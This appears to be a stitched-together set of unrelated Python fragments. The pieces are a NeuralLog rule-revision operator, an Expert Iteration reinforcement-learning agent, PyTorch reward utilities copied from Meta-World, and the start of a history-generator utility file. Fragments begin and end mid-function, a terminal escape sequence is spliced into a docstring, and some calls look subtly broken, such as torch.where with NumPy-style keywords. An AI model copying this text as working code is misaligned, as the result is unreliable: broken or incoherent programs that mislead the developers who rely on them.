def theory_evaluator(self) -> TheoryEvaluator:
return self.learning_system.theory_evaluator
# noinspection PyMissingOrEmptyDocstring
def required_fields(self):
return ["learning_system", "theory_metric"]
@abstractmethod
def perform_operation(self, targets, minimum_threshold=None):
"""
Applies the operation on the theory, given the target examples.
:param targets: the target examples
:type targets: Examples
:param minimum_threshold: a minimum threshold to consider by the
operator. Implementations of this class could use this threshold in
order to improve performance by skipping evaluating candidates
:type minimum_threshold: Optional[float]
:return: the revised theory
:rtype: NeuralLogProgram or None
"""
pass
def theory_revision_accepted(self, revised_theory, examples):
"""
Method to send feedback to the revision operator, telling it that the
revision was accepted.
:param revised_theory: the revised theory
:type revised_theory: NeuralLogProgram
:param examples: the examples used on the revision
:type examples: Examples
"""
pass
def apply_clause_modifiers(self, horn_clause, targets):
"""
Applies the clause modifiers to the `horn_clause`, given the target
examples.
:param horn_clause: the Horn clause
:type horn_clause: HornClause
:param targets: the target examples
:type targets: Examples
:return: the modified Horn clause
:rtype: HornClause
"""
for clause_modifier in self.clause_modifiers:
horn_clause = clause_modifier.modify_clause(horn_clause, targets)
return horn_clause
def check_for_equivalent_clause(self, clause, theory):
"""
Checks if the theory has another clause equivalent to `clause`.
Since full equivalence checking is not trivial, we will consider that
two clauses are equivalent whenever they are equal, except for
constant terms in learnable predicates.
:param clause: the clause
:type clause: HornClause
:param theory: the current theory
:type theory: NeuralLogProgram
:return: `True`, if it does; otherwise, `False`
:rtype: bool
"""
trainable_predicates = set()
base = self.learning_system.knowledge_base
theory = self.learning_system.theory if theory is None else theory
trainable_predicates.update(
base.trainable_predicates,
theory.trainable_predicates)
other_clauses = \
base.clauses_by_predicate.get(clause.head.predicate, [])
for other_clause in other_clauses:
if self._is_clauses_equivalent(
clause, other_clause, trainable_predicates):
return True
other_clauses = \
theory.clauses_by_predicate.get(clause.head.predicate, [])
for other_clause in other_clauses:
if self._is_clauses_equivalent(
clause, other_clause, trainable_predicates):
return True
return False
# noinspection PyMethodMayBeStatic
def _is_clauses_equivalent(self, clause1, clause2, trainable_predicates):
"""
Checks if the clauses are equivalent to each other.
:param clause1: the first clause
:type clause1: HornClause
:param clause2: the second clause
:type clause2: HornClause
:param trainable_predicates: the set of trainable predicates
:type trainable_predicates: Set[Predicate]
:return: `True`, if they are equivalent to each other;
otherwise, `False`
:rtype: bool
"""
if clause1.head != clause2.head:
return False
if len(clause1.body) != len(clause2.body):
return False
for atom1, atom2 in zip(clause1.body, clause2.body):
predicate = atom1.predicate
if predicate != atom2.predicate:
return False
if not self._is_predicate_trainable(
predicate, trainable_predicates):
if atom1.terms != atom2.terms:
return False
return True
@staticmethod
def _is_predicate_trainable(predicate, trainable_predicates):
"""
Checks if the predicate is equivalent to a trainable predicate.
:param predicate: the predicate
:type predicate: Predicate
:param trainable_predicates: the trainable predicates
:type trainable_predicates: Iterable[Predicate]
:return: `True`, if it is; otherwise, `False`
:rtype: bool
"""
for trainable in trainable_predicates:
if predicate.equivalent(trainable):
return True
return False
def __repr__(self):
return self.__class__.__name__
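# Illustrative note (hypothetical clauses): under check_for_equivalent_clause,
# h(X) :- p(X, a). and h(X) :- p(X, b). are treated as equivalent when `p` is
# a trainable (learnable) predicate, because constant terms of learnable
# predicates are ignored; if `p` is not trainable, the differing constants
# `a` and `b` keep the clauses distinct.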
class BottomClauseBoundedRule(RevisionOperator):
"""
Operator that implements Guimarães and Paes rule creation algorithm.
<NAME> and <NAME>, Looking at the Bottom and the Top: A Hybrid
Logical Relational Learning System Based on Answer Sets, 2015 Brazilian
Conference on Intelligent Systems (BRACIS), Natal, 2015, pp. 240-245.
"""
OPTIONAL_FIELDS = dict(RevisionOperator.OPTIONAL_FIELDS)
OPTIONAL_FIELDS.update({
"variable_generator": None,
"relevant_depth": 0,
"refine": False,
"maximum_side_way_movements": 0,
"improvement_threshold": 0.0,
"generic": True,
"evaluation_timeout": 300,
"number_of_process": 1,
"infer_relevant": False
})
def __init__(self,
learning_system=None,
theory_metric=None,
clause_modifiers=None,
variable_generator=None,
relevant_depth=None,
refine=None,
maximum_side_way_movements=None,
improvement_threshold=None,
generic=None,
evaluation_timeout=None,
number_of_process=None,
infer_relevant=None):
"""
Creates a Bottom Clause Bounded Rule operator.
:param learning_system: the learning system
:type learning_system: sls.StructureLearningSystem
:param theory_metric: the theory metric
:type theory_metric: TheoryMetric
:param clause_modifiers: a clause modifier, a list of clause modifiers
or none
:type clause_modifiers: ClauseModifier or Collection[ClauseModifier]
or None
:param variable_generator: the variable generator
:type variable_generator: Optional[VariableGenerator]
:param relevant_depth: the relevant depth
:type relevant_depth: Optional[int]
:param refine: if it is to refine the rules
:type refine: Optional[bool]
:param maximum_side_way_movements: the maximum side way movements
:type maximum_side_way_movements: Optional[int]
:param improvement_threshold: the improvement threshold
:type improvement_threshold: Optional[float]
:param generic: if it is to return the most generic rule
:type generic: Optional[bool]
:param evaluation_timeout: the evaluation timeout, in seconds
:type evaluation_timeout: Optional[int]
:param number_of_process: the number of parallel process
:type number_of_process: Optional[int]
:param infer_relevant: If `True`, in addition to facts in the knowledge
base, it also considers as relevant the facts that could be inferred
by the rules
:type infer_relevant: Optional[bool]
"""
super().__init__(learning_system, theory_metric, clause_modifiers)
self.variable_generator = variable_generator
"The variable name generator."
self.relevant_depth = relevant_depth
"""
The maximum depth on the transitivity of the relevant concept.
An atom is relevant to the example if it shares (or transitively shares)
a term with the example.
If `relevant_depth` is `0`, it means that only the atoms which
actually share a term with the example will be considered,
these atoms are classed as atoms at depth `0`.
If it is `1`, it means that the atoms which share a term with the atoms
at depth `0` will also be considered.
If it is `n`, for `n > 0`, it means that the atoms which share a term
with the atoms at depth `n - 1` will also be considered.
If it is negative, atoms at any depth will be considered.
"""
if relevant_depth is None:
self.relevant_depth = self.OPTIONAL_FIELDS["relevant_depth"]
self.refine = refine
"""
It specifies if the rule must be refined by adding literals to it,
in order to try to improve the rule.
"""
if refine is None:
self.refine = self.OPTIONAL_FIELDS["refine"]
self.maximum_side_way_movements = maximum_side_way_movements
"""
The maximum side way movements, this is, the maximum number of
refining steps will be made, without improving the performance.
If a metric improves by adding a literal to its body, it does not
count as a side way movement and the number of side way steps at the
moment becomes zero.
If it is negative, there is no maximum of side way movements; all
possible literals will be tried, as long as they do not degrade the
rule.
"""
if maximum_side_way_movements is None:
self.maximum_side_way_movements = \
self.OPTIONAL_FIELDS["maximum_side_way_movements"]
self.improvement_threshold = improvement_threshold
"""
The minimal improvement a new candidate must show over the current
clause evaluation to be considered an improvement. If the threshold
is not met, it is considered a side way movement.
Use a threshold of `0.0` and a negative `maximum_side_way_movements`
to allow the search to test all possible rules.
Use a threshold of `e` and a `maximum_side_way_movements` of `0` to
stop as soon as a rule does not improve more than `e`.
"""
if improvement_threshold is None:
self.improvement_threshold = \
self.OPTIONAL_FIELDS["improvement_threshold"]
self.generic = generic
"""
Flag to specify which rule will be returned in case of a tie in the
evaluation of the best rules.
If `generic` is `True`, the most generic tied rule will be returned,
this is, the rule whose body has the fewest number of literals in it.
if `generic` is `False`, the most specific rule will be returned,
instead, this is, the rule whose body has the most number of literals
in it.
"""
if generic is None:
self.generic = self.OPTIONAL_FIELDS["generic"]
self.evaluation_timeout = evaluation_timeout
"""
The maximum amount of time, in seconds, allowed to the evaluation of
a rule.
By default, it is 300 seconds, or 5 minutes.
"""
if evaluation_timeout is None:
self.evaluation_timeout = self.OPTIONAL_FIELDS["evaluation_timeout"]
self.number_of_process = number_of_process
"""
The maximum number of process this class is allowed to create in order
to concurrently evaluate different rules.
The default is `1`.
"""
if number_of_process is None:
self.number_of_process = self.OPTIONAL_FIELDS["number_of_process"]
self.infer_relevant = infer_relevant
"""
If `True`, in addition to facts in the knowledge base, it also
considers as relevant the facts that could be inferred by the rules.
"""
if self.infer_relevant is None:
self.infer_relevant = self.OPTIONAL_FIELDS["infer_relevant"]
if len(extra_info) == 1: # If dictionary only contains info about this agent
# First argument to `torch.full` might create an issue (might break for non 1D actions)
processed_opponent_policy = torch.full((self.action_dim,), float('nan'))
# Adding batch dimension
processed_opponent_obs = torch.full(self.observation_dim, float('nan'))
processed_opponent_obs = self.state_preprocess_fn(processed_opponent_obs)
else:
opponent_index = list(filter(lambda key: key != 'self',
extra_info.keys()))[0] # Not super pretty
opponent_policy = extra_info[opponent_index][self.extra_info_key]
processed_opponent_obs = self.state_preprocess_fn(extra_info[opponent_index]['s'])
if self.extra_info_key == 'a': # Observing only single actions
processed_opponent_policy = nn.functional.one_hot(torch.LongTensor([opponent_policy]), num_classes=self.action_dim).squeeze(0)
elif self.extra_info_key == 'probs': # Observing full action distribution
processed_opponent_policy = torch.FloatTensor(opponent_policy)
else: raise RuntimeError(f'Could not process extra_info_key: {self.extra_info_key}')
return processed_opponent_policy, processed_opponent_obs
def update_storage(self, storage: Storage,
o: torch.Tensor,
r: torch.Tensor,
done: bool,
opponent_policy: torch.Tensor,
opponent_s: torch.Tensor,
mcts_policy: torch.Tensor,
expert_state_value_prediction: torch.Tensor):
storage.add({'normalized_child_visitations': mcts_policy,
's': o})
if self.use_agent_modelling:
storage.add({'opponent_policy': opponent_policy,
'opponent_s': opponent_s})
if self.average_episode_returns_with_mcts_values:
storage.add({'V': expert_state_value_prediction})
if done:
# Hendrik idea:
# Using MCTS value for current search might be better?
if self.average_episode_returns_with_mcts_values:
# Average all previously estimated values with episode return
storage.V = [(value + r) / 2 for value in storage.V]
else:
# Use episodic return for all points
for _ in range(len(storage.s)): storage.add({'V': r})
def model_based_take_action(self, env: Union[gym.Env, List[gym.Env]],
observation, player_index: int, multi_action: bool):
action = self.expert.model_based_take_action(env, observation,
player_index,
multi_action)
self.current_prediction = self.expert.current_prediction
return action
def model_free_take_action(self, state, legal_actions: List[int], multi_action: bool = False):
if self.training: raise RuntimeError('ExpertIterationAgent.model_free_take_action() cannot be called when training is True')
prediction = self.apprentice(self.state_preprocess_fn(state),
legal_actions=legal_actions)
return prediction['a']
def start_server(self, num_connections: int):
''' Starts a neural network server; needed because the different MCTS experts send prediction requests to it. '''
if num_connections == -1: num_connections = multiprocessing.cpu_count()
self.expert.server_handler = NeuralNetServerHandler(
num_connections=num_connections,
net=self.apprentice,
preprocess_fn=self.server_state_preprocess_fn
)
def close_server(self):
self.expert.close_server()
@torch.no_grad()
def policy_fn(self, observation, legal_actions, self_player_index: int = None, requested_player_index: int = None):
processed_obs = self.state_preprocess_fn(observation)
return self.apprentice(processed_obs, legal_actions=legal_actions)['probs'].squeeze(0).numpy()
@torch.no_grad()
def evaluation_fn(self, observation, legal_actions):
processed_obs = self.state_preprocess_fn(observation)
return self.apprentice(processed_obs, legal_actions=legal_actions)['V'].squeeze(0).numpy()
def clone(self):
raise NotImplementedError('Cloning ExpertIterationAgent not supported')
def __repr__(self):
basic_stats = f'Name: {self.name}\nRequires access to other agents: {self.requires_acess_to_other_agents}\n'
agent_stats = (f'Agent modelling: {self.use_agent_modelling}\n'
f'Use apprentice in expert: {self.use_apprentice_in_expert}\n'
f'Use true agent models in mcts: {self.use_true_agent_models_in_mcts}\n'
f'Use learnt opponent models in mcts: {self.use_learnt_opponent_models_in_mcts}\n'
f'Average episode returns with MCTS values: {self.average_episode_returns_with_mcts_values}\n'
f'State processing fn: {self.state_preprocess_fn}\n'
f'Server based State processing fn: {self.server_state_preprocess_fn}'
)
agent = f"Agent:\n{textwrap.indent(str(agent_stats), ' ')}\n"
expert = f"Expert:\n{textwrap.indent(str(self.expert), ' ')}\n"
algorithm = f"Algorithm:\n{textwrap.indent(str(self.algorithm), ' ')}"
return basic_stats + agent + expert + algorithm
#####
# This is a dirty HACK but oh well...
@staticmethod
def opponent_aware_server_based_policy_fn(observation,
legal_actions: List[int],
self_player_index: int,
requested_player_index: int,
connection: Connection,
opponent_connection: Connection) -> np.ndarray:
key = 'probs'
target_connection = connection if requested_player_index == self_player_index else opponent_connection
return request_prediction_from_server(
observation, legal_actions, target_connection, key)
@staticmethod
def learnt_opponent_model_aware_server_based_policy_fn(observation,
legal_actions: List[int],
self_player_index: int,
requested_player_index: int,
connection: Connection) -> np.ndarray:
key = 'probs' if requested_player_index == self_player_index else 'policy_0'
return request_prediction_from_server(
observation, legal_actions, connection, key)
#
####
def choose_feature_extractor(task, config: Dict):
if config['feature_extractor_arch'] == 'CNN':
model = Convolutional2DBody(input_shape=config['preprocessed_input_dimensions'],
channels=config['channels'],
kernel_sizes=config['kernel_sizes'],
paddings=config['paddings'],
strides=config['strides'],
final_feature_dim=config['final_feature_dim'],
residual_connections=config.get('residual_connections', []),
use_batch_normalization=config['use_batch_normalization'])
return model
else:
raise ValueError('Only convolutional architectures are supported for ExpertIterationAgent')
def build_apprentice_model(task, config: Dict) -> nn.Module:
if task.action_type == 'Continuous':
raise ValueError(f'Only Discrete action type tasks are supported. Task {task.name} has a Continuous action_type')
feature_extractor = choose_feature_extractor(task, config)
# REFACTORING: maybe refactor this into its own function and figure out
# how to do a proper separation between agent modelling and no agent modelling.
if config['use_agent_modelling']:
return build_apprentice_with_agent_modelling(
feature_extractor, task, config)
else:
return build_apprentice_no_agent_modelling(feature_extractor, config, task)
def build_apprentice_no_agent_modelling(feature_extractor, config, task) -> nn.Module:
default_embedding_size = [64, 64]
body = FCBody(
state_dim=feature_extractor.feature_dim,
hidden_units=config.get(
'post_feature_extractor_hidden_units',
default_embedding_size
)
)
feature_and_body = SequentialBody([feature_extractor, body])
critic_gate_fn = parse_gating_fn(config.get('critic_gate_fn', None))
return CategoricalActorCriticNet(state_dim=feature_and_body.feature_dim,
action_dim=task.action_dim,
critic_gate_fn=critic_gate_fn,
body=feature_and_body)
def build_apprentice_with_agent_modelling(feature_extractor, task, config):
default_embedding_size = [64]
policy_inference_body = FCBody(
feature_extractor.feature_dim,
hidden_units=config.get(
'post_feature_extractor_policy_inference_hidden_units',
default_embedding_size
)
)
actor_critic_body = FCBody(
feature_extractor.feature_dim,
hidden_units=config.get(
'post_feature_extractor_actor_critic_hidden_units',
default_embedding_size
)
)
# We model all agents but ourselves
num_agents_to_model = task.num_agents - 1
if not isinstance(task.action_dim, (int, float)):
raise ValueError('number of actions must be an integer (1D)')
return PolicyInferenceActorCriticNet(feature_extractor=feature_extractor,
num_policies=num_agents_to_model,
num_actions=task.action_dim,
policy_inference_body=policy_inference_body,
actor_critic_body=actor_critic_body)
def build_expert(task, config: Dict, expert_name: str) -> MCTSAgent:
selection_phase = 'puct' if config['use_apprentice_in_expert'] else 'ucb1'
exploration = f'exploration_factor_{selection_phase}'
expert_config = {
'budget': config['mcts_budget'],
'rollout_budget': config.get('mcts_rollout_budget', 0.),
'selection_phase': selection_phase,
'use_dirichlet': config.get('mcts_use_dirichlet', False),
exploration: config['mcts_exploration_factor'],
'dirichlet_alpha': config['mcts_dirichlet_alpha'],
'dirichlet_strength': config.get('mcts_dirichlet_strength', 1.)
}
return build_MCTS_Agent(task, expert_config, agent_name=expert_name)
def check_parameter_validity(task: 'Task', config: Dict[str, Any]):
''' Checks whether :param: config is compatible with :param: task '''
if config.get('use_agent_modelling', False) and task.num_agents != 2:
raise NotImplementedError('ExpertIterationAgent with agent modelling '
'is only supported with tasks with 2 agents '
'(one agent is this ExpertIterationAgent and the other '
f'will be the opponent). Given task {task.name} '
f'features {task.num_agents} agents.')
if (config.get('use_learnt_opponent_models_in_mcts', False) and
config.get('use_true_agent_models_in_mcts', False)):
raise ValueError("Both flags 'use_true_agent_models_in_mcts' and "
"'use_learnt_opponent_models_in_mcts' were set, which "
"is conflicting. One represents "
"using true opponent models inside of MCTS, the other "
"using learnt opponent models. Read build_ExpertIteration_Agent "
"documentation for further info."
)
def generate_preprocessing_functions(config) -> Tuple[Callable, Callable]:
if 'state_preprocessing_fn' in config:
state_preprocess_fn = parse_preprocessing_fn(
config['state_preprocessing_fn'])
else: state_preprocess_fn = None
if 'server_state_preprocessing_fn' in config:
server_state_preprocess_fn = parse_preprocessing_fn(
config['server_state_preprocessing_fn'])
else: server_state_preprocess_fn = None
return state_preprocess_fn, server_state_preprocess_fn
def build_ExpertIteration_Agent(task: 'Task',
config: Dict[str, Any],
agent_name: str = 'ExIt') -> ExpertIterationAgent:
'''
TODO: Check all params to make sure they are up to date
:param task: Environment specific configuration
:param agent_name: String identifier for the agent
:param config: Dict contain hyperparameters for the ExpertIterationAgent:
Higher level params:
- 'use_apprentice_in_expert': (Bool) whether to bias MCTS's selection
phase and expansion phase with the apprentice.
If False, Expert Iteration becomes the
DAGGER algorithm:
https://www.cs.cmu.edu/~sross1/publications/Ross-AIStats11-NoRegret.pdf
If True, PUCT will be used as a selection
strategy in MCTS, otherwise UCB1 will be used
- 'use_agent_modelling': (Bool) Whether to model other agent's actions
as an auxiliary task, as in the DPIQN paper
- 'use_true_agent_models_in_mcts': (Bool) Whether to use true agent models
to compute priors for MCTS nodes.
- 'use_learnt_opponent_models_in_mcts': (Bool) Whether to use learnt agent models
to compute priors for MCTS nodes.
- 'request_observed_action': Whether to observe one-hot encoded actions; otherwise the full policy will be requested.
Only meaningful when :param: use_agent_modelling is set.
- 'average_episode_returns_with_mcts_values': (Bool) Whether to average
the episode returns with Q values of MCTS' root
node, to serve as targets for the apprentice's
value head. Idea taken from: https://medium.com/oracledevs/lessons-from-alphazero-part-4-improving-the-training-target-6efba2e71628
MCTS params:
- 'mcts_budget': (Int) Number of iterations of the MCTS loop that will be carried
out before an action is selected.
- 'mcts_rollout_budget': (Int) Number of steps to simulate during
rollout_phase
- 'mcts_exploration_factor': (Float) PUCT exploration constant
- 'mcts_use_dirichlet': (Bool) Whether to add dirichlet noise to the
MCTS rootnode's action probabilities (see PUCT)
- 'mcts_dirichlet_alpha': Parameter of Dirichlet distribution
- 'temperature': Value by which MCTS child visitations will be
inversely exponentiated to (N^(1/temperature))
- 'drop_temperature_after_n_moves': Number of moves after which
temperature parameter will dropped
to a very small value (around 0.01)
(Collected) Dataset params:
- 'initial_max_generations_in_memory': (Int) Initial number of generations to be allowed
in replay buffer
- 'increase_memory_every_n_generations': (Int) Number of iterations to elapse before increasing dataset size.
- 'memory_increase_step': Number of extra generations to allow in the
algorithm's dataset everytime the dataset's
capacity increases, as dictated by
:param: increase_memory_every_n_generations
- 'final_max_generations_in_memory': (Int) Ceiling on the size of replay buffer
- 'num_epochs_per_iteration': (Int) Training epochs to over the game dataset per iteration
- 'num_games_per_iteration': (Int) Number of episodes to collect before doing a training
- 'batch_size': (Int) Minibatch size used during training
Neural Network params:
- 'learning_rate': (Float) Learning rate for neural network optimizer
- 'feature_extractor_arch': (str) Architechture for the feature extractor
+ For Convolutional2DBody:
- 'residual_connections': List[Tuple[int, int]] Which layers should have residual skip connections
- 'preprocessed_input_dimensions': Tuple[int] Input dimensions for each channel
- 'channels': Tuple[int]
- 'kernel_sizes': Tuple[int]
- 'paddings': Tuple[int]
- 'final_feature_dim': int. Dimensionality of the final, fully connected layer of a convolutional body
- 'critic_gate_fn': Gating function to be applied to critic's
output head. Supported: ['None', 'tanh']
'''
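# Hedged, hypothetical example of a partial config dict (values are
# illustrative only; see the parameter list above for the full set of keys):
#   config = {
#       'use_apprentice_in_expert': True,
#       'use_agent_modelling': False,
#       'mcts_budget': 100,
#       'mcts_exploration_factor': 1.0,
#       'mcts_dirichlet_alpha': 0.3,
#       'feature_extractor_arch': 'CNN',
#       # ... plus the dataset, neural-network and preprocessing keys above
#   }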
check_parameter_validity(task, config)
apprentice = build_apprentice_model(task, config)
expert = build_expert(task, config, expert_name=f'Expert:{agent_name}')
(state_preprocess_fn, server_state_preprocess_fn) = \
generate_preprocessing_functions(config)
data_augmnentation_fn = parse_data_augmentation_fn(config['data_augmnentation_fn']) \
if 'data_augmnentation_fn' in config else None
algorithm
<reponame>MaxSobolMark/mbrl-lib
"""A set of reward utilities written by the authors of dm_control
Copied from Meta-World repo, branch new-reward-functions.
Modified to use PyTorch instead of NumPy"""
import numpy as np
import torch
# The value returned by tolerance() at `margin` distance from `bounds` interval.
_DEFAULT_VALUE_AT_MARGIN = 0.1
def _sigmoids(x, value_at_1, sigmoid):
"""Returns 1 when `x` == 0, between 0 and 1 otherwise.
Args:
x: A scalar or numpy array.
value_at_1: A float between 0 and 1 specifying the output when `x` == 1.
sigmoid: String, choice of sigmoid type.
Returns:
A numpy array with values between 0.0 and 1.0.
Raises:
ValueError: If not 0 < `value_at_1` < 1, except for `linear`, `cosine` and
`quadratic` sigmoids which allow `value_at_1` == 0.
ValueError: If `sigmoid` is of an unknown type.
"""
if sigmoid in ('cosine', 'linear', 'quadratic'):
if not 0 <= value_at_1 < 1:
raise ValueError(
'`value_at_1` must be nonnegative and smaller than 1, '
'got {}.'.format(value_at_1))
else:
if not 0 < value_at_1 < 1:
raise ValueError('`value_at_1` must be strictly between 0 and 1, '
'got {}.'.format(value_at_1))
if sigmoid == 'gaussian':
scale = np.sqrt(-2 * np.log(value_at_1))
return torch.exp(-0.5 * (x * scale)**2)
elif sigmoid == 'hyperbolic':
scale = np.arccosh(1 / value_at_1)
return 1 / np.cosh(x * scale)
elif sigmoid == 'long_tail':
scale = np.sqrt(1 / value_at_1 - 1)
return 1 / ((x * scale)**2 + 1)
elif sigmoid == 'reciprocal':
scale = 1 / value_at_1 - 1
return 1 / (abs(x) * scale + 1)
elif sigmoid == 'cosine':
scale = np.arccos(2 * value_at_1 - 1) / np.pi
scaled_x = x * scale
return np.where(
abs(scaled_x) < 1, (1 + np.cos(np.pi * scaled_x)) / 2, 0.0)
elif sigmoid == 'linear':
scale = 1 - value_at_1
scaled_x = x * scale
return np.where(abs(scaled_x) < 1, 1 - scaled_x, 0.0)
elif sigmoid == 'quadratic':
scale = np.sqrt(1 - value_at_1)
scaled_x = x * scale
return np.where(abs(scaled_x) < 1, 1 - scaled_x**2, 0.0)
elif sigmoid == 'tanh_squared':
scale = np.arctanh(np.sqrt(1 - value_at_1))
return 1 - np.tanh(x * scale)**2
else:
raise ValueError('Unknown sigmoid type {!r}.'.format(sigmoid))
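# Hedged check (illustrative, not part of the original module): every sigmoid
# returns 1 at x == 0 and `value_at_1` at |x| == 1.
def _sigmoids_example():
    y = _sigmoids(torch.tensor([0.0, 1.0]), value_at_1=0.1, sigmoid='gaussian')
    assert torch.allclose(y, torch.tensor([1.0, 0.1]))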
def tolerance(x,
bounds=(0.0, 0.0),
margin=0.0,
sigmoid='gaussian',
value_at_margin=_DEFAULT_VALUE_AT_MARGIN,
device: str = 'cpu'):
"""Returns 1 when `x` falls inside the bounds, between 0 and 1 otherwise.
Args:
x: A scalar or numpy array.
bounds: A tuple of floats specifying inclusive `(lower, upper)` bounds for
the target interval. These can be infinite if the interval is unbounded
at one or both ends, or they can be equal to one another if the target
value is exact.
margin: Float. Parameter that controls how steeply the output decreases as
`x` moves out-of-bounds.
* If `margin == 0` then the output will be 0 for all values of `x`
outside of `bounds`.
* If `margin > 0` then the output will decrease sigmoidally with
increasing distance from the nearest bound.
sigmoid: String, choice of sigmoid type. Valid values are: 'gaussian',
'linear', 'hyperbolic', 'long_tail', 'cosine', 'tanh_squared'.
value_at_margin: A float between 0 and 1 specifying the output value when
the distance from `x` to the nearest bound is equal to `margin`. Ignored
if `margin == 0`.
Returns:
A float or numpy array with values between 0.0 and 1.0.
Raises:
ValueError: If `bounds[0] > bounds[1]`.
ValueError: If `margin` is negative.
"""
lower, upper = bounds
if lower > upper:
raise ValueError(
f'Lower bound must be <= upper bound. Lower: {lower}; upper: {upper}'
)
# if margin < 0.:
# print('margin: ', margin)
# print('numpy: ', margin.numpy())
# raise ValueError('`margin` must be non-negative. Current value: {}'.format(margin))
in_bounds = torch.logical_and(lower <= x, x <= upper)
d = torch.divide(
torch.where(x < lower, lower - x, x - upper),
#tf.cast(margin, tf.float32))
margin)
value = torch.where(
(margin == 0).to(device),
torch.where(in_bounds, 1.0, 0.0).to(device),
torch.where(in_bounds.to(device),
torch.Tensor([1.0]).to(device),
_sigmoids(d, value_at_margin,
sigmoid).to(device)).to(device))
return float(value) if x.shape == () else value
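# Hedged usage sketch (illustrative values): points inside `bounds` score 1.0
# and a point exactly `margin` away from the nearest bound scores
# `value_at_margin` (0.1 by default). `margin` is passed as a tensor here
# because the implementation above calls `.to(device)` on `margin == 0`.
def _tolerance_example():
    x = torch.tensor([0.05, 0.2])
    y = tolerance(x, bounds=(0.0, 0.1), margin=torch.tensor(0.1))
    assert torch.allclose(y, torch.tensor([1.0, 0.1]))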
def inverse_tolerance(x, bounds=(0.0, 0.0), margin=0.0, sigmoid='reciprocal'):
"""Returns 0 when `x` falls inside the bounds, betw[<0;34;31M]een 1 and 0 otherwise.
Args:
x: A scalar or numpy array.
bounds: A tuple of floats specifying inclusive `(lower, upper)` bounds for
the target interval. These can be infinite if the interval is unbounded
at one or both ends, or they can be equal to one another if the target
value is exact.
margin: Float. Parameter that controls how steeply the output decreases as
`x` moves out-of-bounds.
* If `margin == 0` then the output will be 0 for all values of `x`
outside of `bounds`.
* If `margin > 0` then the output will decrease sigmoidally with
increasing distance from the nearest bound.
sigmoid: String, choice of sigmoid type. Valid values are: 'gaussian',
'linear', 'hyperbolic', 'long_tail', 'cosine', 'tanh_squared'.
value_at_margin: A float between 0 and 1 specifying the output value when
the distance from `x` to the nearest bound is equal to `margin`. Ignored
if `margin == 0`.
Returns:
A float or numpy array with values between 0.0 and 1.0.
Raises:
ValueError: If `bounds[0] > bounds[1]`.
ValueError: If `margin` is negative.
"""
bound = tolerance(x,
bounds=bounds,
margin=margin,
sigmoid=sigmoid,
value_at_margin=0)
return 1 - bound
def rect_prism_tolerance(curr, zero, one):
"""Computes a reward if curr is inside a rectangluar prism region.
The 3d points curr and zero specify 2 diagonal corners of a rectangular
prism that represents the decreasing region.
one represents the corner of the prism that has a reward of 1.
zero represents the diagonal opposite corner of the prism that has a reward
of 0.
Curr is the point that the prism reward region is being applied for.
Args:
curr(np.ndarray): The point who's reward is being assessed.
shape is (3,).
zero(np.ndarray): One corner of the rectangular prism, with reward 0.
shape is (3,)
one(np.ndarray): The diagonal opposite corner of one, with reward 1.
shape is (3,)
"""
in_range = lambda a, b, c: float(b <= a <= c) if c >= b else float(c <= a <= b)
in_prism = (in_range(curr[0], zero[0], one[0])
and in_range(curr[1], zero[1], one[1])
and in_range(curr[2], zero[2], one[2]))
if in_prism:
diff = one - zero
x_scale = (curr[0] - zero[0]) / diff[0]
y_scale = (curr[1] - zero[1]) / diff[1]
z_scale = (curr[2] - zero[2]) / diff[2]
return x_scale * y_scale * z_scale
# return 0.01
else:
return 1.
def hamacher_product(a: torch.Tensor, b: torch.Tensor,
device: str) -> torch.Tensor:
"""The element-wise hamacher (t-norm) product of a and b.
computes (a * b) / ((a + b) - (a * b))
Args:
a (tf.Tensor): Shape: [n] 1st term of hamacher product.
b (tf.Tensor): Shape: [n] 2nd term of hamacher product.
Raises:
ValueError: a and b must range between 0 and 1
Returns:
tf.Tensor: The element-wise hamacher product of a and b.
"""
# if not ((0. <= a <= 1.) and (0. <= b <= 1.)):
# raise ValueError("a and b must range between 0 and 1")
# a_times_b = tf.multiply(a, b) # Element-wise
a_times_b = a * b # Element-wise
denominator = a + b - a_times_b
h_prod = torch.where(denominator > 0, torch.divide(a_times_b, denominator),
torch.zeros(1).to(device))
# assert 0. <= h_prod <= 1.
return h_prod
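# Hedged check (illustrative values): the Hamacher t-norm stays in [0, 1],
# is 0 whenever either input is 0, and is 1 only when both inputs are 1.
def _hamacher_product_example():
    a = torch.tensor([0.0, 0.5, 1.0])
    b = torch.tensor([0.5, 0.5, 1.0])
    h = hamacher_product(a, b, device='cpu')
    assert torch.allclose(h, torch.tensor([0.0, 1.0 / 3.0, 1.0]))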
def _reward_pos(obs: torch.Tensor, goal_position: torch.Tensor,
device: str) -> torch.Tensor:
"""Modified version of _reward_pos that doesn't require theta.
Args:
obs (tf.Tensor): Shape: [n, obs_dims]
goal_position (tf.Tensor): [n, goal_dims]
Returns:
[type]: [description]
"""
hand = obs[:, :3]
door = obs[:, 4:7] + torch.tensor([-0.05, 0, 0])
threshold = 0.12
# floor is a 3D funnel centered on the door handle
radius = torch.norm(hand[:, :2] - door[:, :2], dim=-1)
floor = torch.where(condition=radius <= threshold,
x=0.0,
y=0.04 * torch.log(radius - threshold) + 0.4)
# if radius <= threshold:
# floor = 0.0
# else:
# floor = 0.04 * tf.math.log(radius - threshold) + 0.4
# prevent the hand from running into the handle prematurely by keeping
# it above the "floor"
above_floor = torch.where(condition=hand[:, 2] >= floor,
x=1.0,
y=tolerance(
floor - hand[:, 2],
bounds=(0.0, 0.01),
margin=torch.maximum(
floor / 2.0,
torch.broadcast_to(0.0, floor.shape)),
sigmoid='long_tail',
))
# above_floor = 1.0 if hand[2] >= floor else tolerance(
# floor - hand[2],
# bounds=(0.0, 0.01),
# margin=tf.math.maximum(floor /
<filename>history_generator/internal/utility.py
import random
import shlex
import struct
import subprocess
import time
from functools import reduce
from tkinter import font
from math import *
import sys
import platform
import os
START_BATTLES_MINIMIZED = False
S_WIDTH = 1000
S_HEIGHT = 1000
DISPLAY_WIDTH = 1280
DISPLAY_HEIGHT = 720
CELL_SIZE = 6 # cells are squares, this is the side length
SCROLL_SPEED = CELL_SIZE
def sum_dict(d):
total = 0
for k in d:
total += d[k]
return total
def listbox_capacity(listbox):
new_font = font.Font(listbox, listbox['font'])
return listbox.winfo_height() / new_font.metrics()['ascent']
def count(l):
res = {}
for i in l:
if i in res:
res[i] += 1
else:
res[i] = 1
return res
def tuplize(l):
res = l
for i in range(len(res)):
if isinstance(res[i], list):
res[i] = tuplize(res[i])
return tuple(res)
def get_time_span_length(start_date, end_date):
year_dif, month_dif, day_dif = end_date[0] - start_date[0], end_date[1] - start_date[1], end_date[2] - start_date[2]
if day_dif < 0:
month_dif -= 1
day_dif += 30
if month_dif < 0:
